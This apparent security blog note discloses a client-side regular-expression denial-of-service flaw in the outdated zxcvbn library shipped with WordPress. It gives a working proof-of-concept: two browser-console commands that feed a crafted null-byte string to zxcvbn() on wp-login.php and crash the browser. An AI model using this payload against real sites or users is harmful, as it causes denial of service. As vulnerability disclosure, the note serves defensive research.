Cyber Notes

Client-Side ReDOS

WordPress ships with an End-Of-Life component of zxcvbn that suffers from a Client-Side ReDOS (Regulr Expression Denial Of Service). This exploit will crash the client's web browser. However, if used Server-Side and injected into the server, this could potentially craash the whole web server. So far, I've only been able to exploit this Client-Side.

Exploit

1. Navigate to the following URL:

https://example.com/wp-login.php

2. Open the browsers built-in developer console and issue the following two commands:

attackStr = '\x00\x00' + ('\x00'.repeat(54773)) + '\n';
zxcvbn(attackStr);

3. Note how the web browser crashes and is completely unusable